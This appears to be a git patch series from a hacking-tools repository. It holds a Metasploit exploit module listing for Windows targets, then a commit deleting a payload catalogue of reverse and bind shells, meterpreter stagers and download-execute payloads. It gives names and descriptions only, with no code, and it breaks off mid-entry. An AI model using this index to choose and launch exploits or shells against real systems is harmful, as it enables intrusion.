Buffer Overflow + windows/misc/ufo_ai 2009-10-28 average No UFO: Alien Invasion IRC Client Buffer Overflow + windows/misc/vmhgfs_webdav_dll_sideload 2016-08-05 normal No DLL Side Loading Vulnerability in VMware Host Guest Client Redirector + windows/misc/webdav_delivery 1999-01-01 manual No Serve DLL via webdav server + windows/misc/windows_rsh 2007-07-24 average No Windows RSH Daemon Buffer Overflow + windows/misc/wireshark_lua 2011-07-18 excellent No Wireshark console.lua Pre-Loading Script Execution + windows/misc/wireshark_packet_dect 2011-04-18 good No Wireshark packet-dect.c Stack Buffer Overflow + windows/mmsp/ms10_025_wmss_connect_funnel 2010-04-13 great No Windows Media Services ConnectFunnel Stack Buffer Overflow + windows/motorola/timbuktu_fileupload 2008-05-10 excellent No Timbuktu Pro Directory Traversal/File Upload + windows/mssql/lyris_listmanager_weak_pass 2005-12-08 excellent No Lyris ListManager MSDE Weak sa Password + windows/mssql/ms02_039_slammer 2002-07-24 good Yes MS02-039 Microsoft SQL Server Resolution Overflow + windows/mssql/ms02_056_hello 2002-08-05 good Yes MS02-056 Microsoft SQL Server Hello Overflow + windows/mssql/ms09_004_sp_replwritetovarbin 2008-12-09 good Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption + windows/mssql/ms09_004_sp_replwritetovarbin_sqli 2008-12-09 excellent Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection + windows/mssql/mssql_clr_payload 1999-01-01 excellent Yes Microsoft SQL Server Clr Stored Procedure Payload Execution + windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution + windows/mssql/mssql_payload 2000-05-30 excellent Yes Microsoft SQL Server Payload Execution + windows/mssql/mssql_payload_sqli 2000-05-30 excellent No Microsoft SQL Server Payload Execution via SQL Injection + windows/mysql/mysql_mof 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows MOF Execution + windows/mysql/mysql_start_up 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows FILE Privilege Abuse + windows/mysql/mysql_yassl_hello 2008-01-04 average No MySQL yaSSL SSL Hello Message Buffer Overflow + windows/mysql/scrutinizer_upload_exec 2012-07-27 excellent Yes Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential + windows/nfs/xlink_nfsd 2006-11-06 average No Omni-NFS Server Buffer Overflow + windows/nntp/ms05_030_nntp 2005-06-14 normal No MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow + windows/novell/file_reporter_fsfui_upload 2012-11-16 great No NFR Agent FSFUI Record File Upload RCE + windows/novell/groupwisemessenger_client 2008-07-02 normal No Novell GroupWise Messenger Client Buffer Overflow + windows/novell/netiq_pum_eval 2012-11-15 excellent Yes NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution + windows/novell/nmap_stor 2006-12-23 average No Novell NetMail NMAP STOR Buffer Overflow + windows/novell/zenworks_desktop_agent 2005-05-19 good No Novell ZENworks 6.5 Desktop/Server Management Overflow + windows/novell/zenworks_preboot_op21_bof 2010-03-30 normal No Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow + windows/novell/zenworks_preboot_op4c_bof 2012-02-22 normal No Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow + windows/novell/zenworks_preboot_op6_bof 2010-03-30 normal No Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow + windows/novell/zenworks_preboot_op6c_bof 2012-02-22 normal No Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow + windows/nuuo/nuuo_cms_fu 2018-10-11 manual No Nuuo Central Management Server Authenticated Arbitrary File Upload + windows/nuuo/nuuo_cms_sqli 2018-10-11 normal No Nuuo Central Management Authenticated SQL Server SQLi + windows/oracle/client_system_analyzer_upload 2011-01-18 excellent Yes Oracle Database Client System Analyzer Arbitrary File Upload + windows/oracle/extjob 2007-01-01 excellent Yes Oracle Job Scheduler Named Pipe Command Execution + windows/oracle/osb_ndmp_auth 2009-01-14 good No Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow + windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow + windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow + windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow + windows/pop3/seattlelab_pass 2003-05-07 great No Seattle Lab Mail 5.5 POP3 Buffer Overflow + windows/postgres/postgres_payload 2009-04-10 excellent Yes PostgreSQL for Microsoft Windows Payload Execution + windows/proxy/bluecoat_winproxy_host 2005-01-05 great No Blue Coat WinProxy Host Header Overflow + windows/proxy/ccproxy_telnet_ping 2004-11-11 average Yes CCProxy Telnet Proxy Ping Overflow + windows/proxy/proxypro_http_get 2004-02-23 great No Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow + windows/proxy/qbik_wingate_wwwproxy 2006-06-07 good Yes Qbik WinGate WWW Proxy Server URL Processing Overflow + windows/scada/abb_wserver_exec 2013-04-05 excellent Yes ABB MicroSCADA wserver.exe Remote Code Execution + windows/scada/advantech_webaccess_dashboard_file_upload 2016-02-05 excellent Yes Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload + windows/scada/advantech_webaccess_webvrpcs_bof 2017-11-02 good No Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow + windows/scada/citect_scada_odbc 2008-06-11 normal No CitectSCADA/CitectFacilities ODBC Buffer Overflow + windows/scada/codesys_gateway_server_traversal 2013-02-02 excellent No SCADA 3S CoDeSys Gateway Server Directory Traversal + windows/scada/codesys_web_server 2011-12-02 normal Yes SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow + windows/scada/daq_factory_bof 2011-09-13 good No DaqFactory HMI NETB Request Overflow + windows/scada/delta_ia_commgr_bof 2018-07-02 normal No Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow + windows/scada/factorylink_csservice 2011-03-25 normal No Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow + windows/scada/factorylink_vrn_09 2011-03-21 average No Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow + windows/scada/ge_proficy_cimplicity_gefebt 2014-01-23 excellent Yes GE Proficy CIMPLICITY gefebt.exe Remote Code Execution + windows/scada/iconics_genbroker 2011-03-21 good No Iconics GENESIS32 Integer Overflow Version 9.21.201.01 + windows/scada/iconics_webhmi_setactivexguid 2011-05-05 good No ICONICS WebHMI ActiveX Buffer Overflow + windows/scada/igss9_igssdataserver_listall 2011-03-24 good No 7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow + windows/scada/igss9_igssdataserver_rename 2011-03-24 normal No 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow + windows/scada/igss9_misc 2011-03-24 excellent No 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities + windows/scada/igss_exec_17 2011-03-21 excellent No Interactive Graphical SCADA System Remote Command Injection + windows/scada/indusoft_webstudio_exec 2011-11-04 excellent Yes InduSoft Web Studio Arbitrary Upload Remote Code Execution + windows/scada/moxa_mdmtool 2010-10-20 great No MOXA Device Manager Tool 2.1 Buffer Overflow + windows/scada/procyon_core_server 2011-09-08 normal Yes Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow + windows/scada/realwin 2008-09-26 great No DATAC RealWin SCADA Server Buffer Overflow + windows/scada/realwin_on_fc_binfile_a 2011-03-21 great No DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow + windows/scada/realwin_on_fcs_login 2011-03-21 great No RealWin SCADA Server DATAC Login Buffer Overflow + windows/scada/realwin_scpc_initialize 2010-10-15 great No DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow + windows/scada/realwin_scpc_initialize_rf 2010-10-15 great No DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow + windows/scada/realwin_scpc_txtevent 2010-11-18 great No DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow + windows/scada/scadapro_cmdexe 2011-09-16 excellent No Measuresoft ScadaPro Remote Command Execution + windows/scada/sunway_force_control_netdbsrv 2011-09-22 great No Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57 + windows/scada/winlog_runtime 2011-01-13 great No Sielco Sistemi Winlog Buffer Overflow + windows/scada/winlog_runtime_2 2012-06-04 normal No Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16 + windows/scada/yokogawa_bkbcopyd_bof 2014-03-10 normal Yes Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow + windows/scada/yokogawa_bkesimmgr_bof 2014-03-10 normal Yes Yokogawa CS3000 BKESimmgr.exe Buffer Overflow + windows/scada/yokogawa_bkfsim_vhfd 2014-05-23 normal No Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow + windows/scada/yokogawa_bkhodeq_bof 2014-03-10 average Yes Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow + windows/sip/aim_triton_cseq 2006-07-10 great No AIM Triton 1.0.4 CSeq Buffer Overflow + windows/sip/sipxezphone_cseq 2006-07-10 great No SIPfoundry sipXezPhone 0.35a CSeq Field Overflow + windows/sip/sipxphone_cseq 2006-07-10 great No SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow + windows/smb/generic_smb_dll_injection 2015-03-04 manual No Generic DLL Injection From Shared Resource + windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource + windows/smb/ipass_pipe_exec 2015-01-21 excellent Yes IPass Control Pipe Remote Command Execution + windows/smb/ms03_049_netapi 2003-11-11 good No MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow + windows/smb/ms04_007_killbill 2004-02-10 low No MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow + windows/smb/ms04_011_lsass 2004-04-13 good No MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow + windows/smb/ms04_031_netdde 2004-10-12 good No MS04-031 Microsoft NetDDE Service Overflow + windows/smb/ms05_039_pnp 2005-08-09 good Yes MS05-039 Microsoft Plug and Play Service Overflow + windows/smb/ms06_025_rasmans_reg 2006-06-13 good No MS06-025 Microsoft RRAS Service RASMAN Registry Overflow + windows/smb/ms06_025_rras 2006-06-13 average No MS06-025 Microsoft RRAS Service Overflow + windows/smb/ms06_040_netapi 2006-08-08 good No MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow + windows/smb/ms06_066_nwapi 2006-11-14 good No MS06-066 Microsoft Services nwapi32.dll Module Exploit + windows/smb/ms06_066_nwwks 2006-11-14 good No MS06-066 Microsoft Services nwwks.dll Module Exploit + windows/smb/ms06_070_wkssvc 2006-11-14 manual No MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow + windows/smb/ms07_029_msdns_zonename 2007-04-12 manual No MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) + windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption + windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference + windows/smb/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution + windows/smb/ms10_061_spoolss 2010-09-14 excellent No MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability + windows/smb/ms15_020_shortcut_icon_dllloader 2015-03-10 excellent No Microsoft Windows Shell LNK Code Execution + windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption + windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ + windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution + windows/smb/netidentity_xtierrpcpipe 2009-04-06 great No Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow + windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution + windows/smb/psexec_psh 1999-01-01 manual No Microsoft Windows Authenticated Powershell Command Execution + windows/smb/smb_delivery 2016-07-26 excellent No SMB Delivery + windows/smb/smb_relay 2001-03-31 excellent No MS08-068 Microsoft Windows SMB Relay Code Execution + windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great No Timbuktu PlughNTCommand Named Pipe Buffer Overflow + windows/smb/webexec 2018-10-24 manual No WebExec Authenticated User Code Execution + windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 good Yes TABS MailCarrier v2.51 SMTP EHLO Overflow + windows/smtp/mercury_cram_md5 2007-08-18 great No Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow + windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 good Yes MS03-046 Exchange 2000 XEXCH50 Heap Overflow + windows/smtp/njstar_smtp_bof 2011-10-31 normal Yes NJStar Communicator 3.00 MiniSMTP Buffer Overflow + windows/smtp/sysgauge_client_bof 2017-02-28 normal No SysGauge SMTP Validation Buffer Overflow + windows/smtp/wmailserver 2005-07-11 average No SoftiaCom WMailserver 1.0 Buffer Overflow + windows/smtp/ypops_overflow1 2004-09-27 average Yes YPOPS 0.6 Buffer Overflow + windows/ssh/freeftpd_key_exchange 2006-05-12 average No FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow + windows/ssh/freesshd_authbypass 2010-08-11 excellent Yes Freesshd Authentication Bypass + windows/ssh/freesshd_key_exchange 2006-05-12 average No FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow + windows/ssh/putty_msg_debug 2002-12-16 normal No PuTTY Buffer Overflow + windows/ssh/securecrt_ssh1 2002-07-23 average No SecureCRT SSH1 Buffer Overflow + windows/ssh/sysax_ssh_username 2012-02-27 normal Yes Sysax 5.53 SSH Username Buffer Overflow + windows/ssl/ms04_011_pct 2004-04-13 average No MS04-011 Microsoft Private Communications Transport Overflow + windows/telnet/gamsoft_telsrv_username 2000-07-17 average Yes GAMSoft TelSrv 1.5 Username Buffer Overflow + windows/telnet/goodtech_telnet 2005-03-15 average No GoodTech Telnet Server Buffer Overflow + windows/tftp/attftp_long_filename 2006-11-27 average No Allied Telesyn TFTP Server 1.9 Long Filename Overflow + windows/tftp/distinct_tftp_traversal 2012-04-08 excellent No Distinct TFTP 3.10 Writable Directory Traversal Execution + windows/tftp/dlink_long_filename 2007-03-12 good No D-Link TFTP 1.0 Long Filename Buffer Overflow + windows/tftp/futuresoft_transfermode 2005-05-31 average No FutureSoft TFTP Server 2000 Transfer-Mode Overflow + windows/tftp/netdecision_tftp_traversal 2009-05-16 excellent No NetDecision 4.2 TFTP Writable Directory Traversal Execution + windows/tftp/opentftp_error_code 2008-07-05 average No OpenTFTP SP 1.4 Error Packet Overflow + windows/tftp/quick_tftp_pro_mode 2008-03-27 good No Quick FTP Pro 2.1 Transfer-Mode Overflow + windows/tftp/tftpd32_long_filename 2002-11-19 average No TFTPD32 Long Filename Buffer Overflow + windows/tftp/tftpdwin_long_filename 2006-09-21 great No TFTPDWIN v0.4.2 Long Filename Buffer Overflow + windows/tftp/tftpserver_wrq_bof 2008-03-26 normal No TFTP Server for Windows 1.4 ST WRQ Buffer Overflow + windows/tftp/threectftpsvc_long_mode 2006-11-27 great No 3CTftpSvc TFTP Long Mode Buffer Overflow + windows/unicenter/cam_log_security 2005-08-22 great Yes CA CAM log_security() Stack Buffer Overflow (Win32) + windows/vnc/realvnc_client 2001-01-29 normal No RealVNC 3.3.7 Client Buffer Overflow + windows/vnc/ultravnc_client 2006-04-04 normal No UltraVNC 1.0.1 Client Buffer Overflow + windows/vnc/ultravnc_viewer_bof 2008-02-06 normal No UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow + windows/vnc/winvnc_http_get 2001-01-29 average No WinVNC Web Server GET Overflow + windows/vpn/safenet_ike_11 2009-06-01 average No SafeNet SoftRemote IKE Service Buffer Overflow + windows/winrm/winrm_script_exec 2012-11-01 manual No WinRM Script Exec Remote Code Execution + windows/wins/ms04_045_wins 2004-12-14 great Yes MS04-045 Microsoft WINS Service Memory Overwrite + + From 26d51c12fc4342fc44bb2cfa9a378f5613297b42 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 6 Apr 2019 17:54:57 +0100 Subject: [PATCH 086/214] Delete payloads.txt --- tools/payloads.txt | 546 --------------------------------------------- 1 file changed, 546 deletions(-) delete mode 100644 tools/payloads.txt diff --git a/tools/payloads.txt b/tools/payloads.txt deleted file mode 100644 index 76b9bed..0000000 --- a/tools/payloads.txt +++ /dev/null @@ -1,546 +0,0 @@ -Payloads -======== - - Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- - aix/ppc/shell_bind_tcp normal No AIX Command Shell, Bind TCP Inline - aix/ppc/shell_find_port normal No AIX Command Shell, Find Port Inline - aix/ppc/shell_interact normal No AIX execve Shell for inetd - aix/ppc/shell_reverse_tcp normal No AIX Command Shell, Reverse TCP Inline - android/meterpreter/reverse_http normal No Android Meterpreter, Android Reverse HTTP Stager - android/meterpreter/reverse_https normal No Android Meterpreter, Android Reverse HTTPS Stager - android/meterpreter/reverse_tcp normal No Android Meterpreter, Android Reverse TCP Stager - android/meterpreter_reverse_http normal No Android Meterpreter Shell, Reverse HTTP Inline - android/meterpreter_reverse_https normal No Android Meterpreter Shell, Reverse HTTPS Inline - android/meterpreter_reverse_tcp normal No Android Meterpreter Shell, Reverse TCP Inline - android/shell/reverse_http normal No Command Shell, Android Reverse HTTP Stager - android/shell/reverse_https normal No Command Shell, Android Reverse HTTPS Stager - android/shell/reverse_tcp normal No Command Shell, Android Reverse TCP Stager - apple_ios/aarch64/meterpreter_reverse_http normal No Apple_iOS Meterpreter, Reverse HTTP Inline - apple_ios/aarch64/meterpreter_reverse_https normal No Apple_iOS Meterpreter, Reverse HTTPS Inline - apple_ios/aarch64/meterpreter_reverse_tcp normal No Apple_iOS Meterpreter, Reverse TCP Inline - apple_ios/aarch64/shell_reverse_tcp normal No Apple iOS aarch64 Command Shell, Reverse TCP Inline - bsd/sparc/shell_bind_tcp normal No BSD Command Shell, Bind TCP Inline - bsd/sparc/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline - bsd/vax/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline - bsd/x64/exec normal No BSD x64 Execute Command - bsd/x64/shell_bind_ipv6_tcp normal No BSD x64 Command Shell, Bind TCP Inline (IPv6) - bsd/x64/shell_bind_tcp normal No BSD x64 Shell Bind TCP - bsd/x64/shell_bind_tcp_small normal No BSD x64 Command Shell, Bind TCP Inline - bsd/x64/shell_reverse_ipv6_tcp normal No BSD x64 Command Shell, Reverse TCP Inline (IPv6) - bsd/x64/shell_reverse_tcp normal No BSD x64 Shell Reverse TCP - bsd/x64/shell_reverse_tcp_small normal No BSD x64 Command Shell, Reverse TCP Inline - bsd/x86/exec normal No BSD Execute Command - bsd/x86/metsvc_bind_tcp normal No FreeBSD Meterpreter Service, Bind TCP - bsd/x86/metsvc_reverse_tcp normal No FreeBSD Meterpreter Service, Reverse TCP Inline - bsd/x86/shell/bind_ipv6_tcp normal No BSD Command Shell, Bind TCP Stager (IPv6) - bsd/x86/shell/bind_tcp normal No BSD Command Shell, Bind TCP Stager - bsd/x86/shell/find_tag normal No BSD Command Shell, Find Tag Stager - bsd/x86/shell/reverse_ipv6_tcp normal No BSD Command Shell, Reverse TCP Stager (IPv6) - bsd/x86/shell/reverse_tcp normal No BSD Command Shell, Reverse TCP Stager - bsd/x86/shell_bind_tcp normal No BSD Command Shell, Bind TCP Inline - bsd/x86/shell_bind_tcp_ipv6 normal No BSD Command Shell, Bind TCP Inline (IPv6) - bsd/x86/shell_find_port normal No BSD Command Shell, Find Port Inline - bsd/x86/shell_find_tag normal No BSD Command Shell, Find Tag Inline - bsd/x86/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline - bsd/x86/shell_reverse_tcp_ipv6 normal No BSD Command Shell, Reverse TCP Inline (IPv6) - bsdi/x86/shell/bind_tcp normal No BSDi Command Shell, Bind TCP Stager - bsdi/x86/shell/reverse_tcp normal No BSDi Command Shell, Reverse TCP Stager - bsdi/x86/shell_bind_tcp normal No BSDi Command Shell, Bind TCP Inline - bsdi/x86/shell_find_port normal No BSDi Command Shell, Find Port Inline - bsdi/x86/shell_reverse_tcp normal No BSDi Command Shell, Reverse TCP Inline - cmd/mainframe/apf_privesc_jcl normal No JCL to Escalate Privileges - cmd/mainframe/bind_shell_jcl normal No Z/OS (MVS) Command Shell, Bind TCP - cmd/mainframe/generic_jcl normal No Generic JCL Test for Mainframe Exploits - cmd/mainframe/reverse_shell_jcl normal No Z/OS (MVS) Command Shell, Reverse TCP - cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK) - cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd) - cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd) - cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua) - cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat) - cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e) - cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6 - cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs) - cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl) - cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6 - cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R) - cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby) - cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6 - cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat) - cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub) - cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh) - cmd/unix/generic normal No Unix Command, Generic Command Execution - cmd/unix/interact normal No Unix Command, Interact with Established Connection - cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet) - cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK) - cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp) - cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet) - cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh) - cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua) - cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat) - cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat) - cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e) - cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs) - cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl) - cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl) - cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl) - cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php) - cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python) - cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python) - cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R) - cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby) - cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby) - cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat) - cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet) - cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub) - cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh) - cmd/windows/adduser normal No Windows Execute net user /ADD CMD - cmd/windows/bind_lua normal No Windows Command Shell, Bind TCP (via Lua) - cmd/windows/bind_perl normal No Windows Command Shell, Bind TCP (via Perl) - cmd/windows/bind_perl_ipv6 normal No Windows Command Shell, Bind TCP (via perl) IPv6 - cmd/windows/bind_ruby normal No Windows Command Shell, Bind TCP (via Ruby) - cmd/windows/download_eval_vbs normal No Windows Executable Download and Evaluate VBS - cmd/windows/download_exec_vbs normal No Windows Executable Download and Execute (via .vbs) - cmd/windows/generic normal No Windows Command, Generic Command Execution - cmd/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP - cmd/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP - cmd/windows/reverse_lua normal No Windows Command Shell, Reverse TCP (via Lua) - cmd/windows/reverse_perl normal No Windows Command, Double Reverse TCP Connection (via Perl) - cmd/windows/reverse_powershell normal No Windows Command Shell, Reverse TCP (via Powershell) - cmd/windows/reverse_ruby normal No Windows Command Shell, Reverse TCP (via Ruby) - firefox/exec normal No Firefox XPCOM Execute Command - firefox/shell_bind_tcp normal No Command Shell, Bind TCP (via Firefox XPCOM script) - firefox/shell_reverse_tcp normal No Command Shell, Reverse TCP (via Firefox XPCOM script) - generic/custom normal No Custom Payload - generic/debug_trap normal No Generic x86 Debug Trap - generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline - generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline - generic/tight_loop normal No Generic x86 Tight Loop - java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline - java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline - java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager - java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager - java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager - java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager - java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager - java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager - java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline - linux/aarch64/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager - linux/aarch64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/aarch64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/aarch64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/aarch64/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager - linux/aarch64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/armbe/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/armbe/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/armbe/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/armbe/shell_bind_tcp normal No Linux ARM Big Endian Command Shell, Bind TCP Inline - linux/armle/adduser normal No Linux Add User - linux/armle/exec normal No Linux Execute Command - linux/armle/meterpreter/bind_tcp normal No Linux Meterpreter, Bind TCP Stager - linux/armle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager - linux/armle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/armle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/armle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/armle/shell/bind_tcp normal No Linux dup2 Command Shell, Bind TCP Stager - linux/armle/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager - linux/armle/shell_bind_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/armle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/mips64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/mips64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/mips64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/mipsbe/exec normal No Linux Execute Command - linux/mipsbe/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager - linux/mipsbe/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/mipsbe/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/mipsbe/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/mipsbe/reboot normal No Linux Reboot - linux/mipsbe/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager - linux/mipsbe/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/mipsbe/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/mipsle/exec normal No Linux Execute Command - linux/mipsle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager - linux/mipsle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/mipsle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/mipsle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/mipsle/reboot normal No Linux Reboot - linux/mipsle/shell/reverse_tcp normal No Linux Command 